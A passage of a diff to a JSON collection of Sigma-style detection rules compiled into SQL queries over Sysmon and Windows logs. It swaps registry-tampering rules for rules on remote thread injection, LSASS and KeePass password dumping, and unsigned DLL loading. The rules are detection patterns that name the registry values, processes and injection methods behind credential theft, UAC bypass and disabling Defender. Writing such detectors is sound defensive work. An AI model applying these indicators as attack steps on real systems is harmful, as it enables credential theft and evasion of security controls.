"status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 
'%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE 
'%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' 
ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE 
'%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Outlook 
EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", - "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - 
"attack.t1548.002" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE 
'%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA 
GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", + "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "New File Association Using Exefile", - "id": 
"44a22d59-b175-4f13-8c16-cbaef5b581ff", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Administrator actions" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" - ], - "filename": "registry_set_disable_windows_defender_service.yml" - }, - { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. 
(see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Standard User In High Privileged Group", + "id": 